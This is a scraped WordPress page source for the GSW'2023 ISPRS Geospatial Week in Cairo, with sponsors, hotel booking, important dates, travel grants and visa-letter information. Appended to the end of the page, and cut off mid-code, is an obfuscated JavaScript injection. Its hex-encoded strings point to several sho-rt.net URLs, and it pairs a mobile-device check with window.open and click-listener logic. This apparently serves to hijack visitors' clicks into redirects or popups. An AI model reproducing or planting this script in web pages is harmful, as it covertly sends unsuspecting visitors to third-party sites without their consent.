height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686348918972{margin-top: 160px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 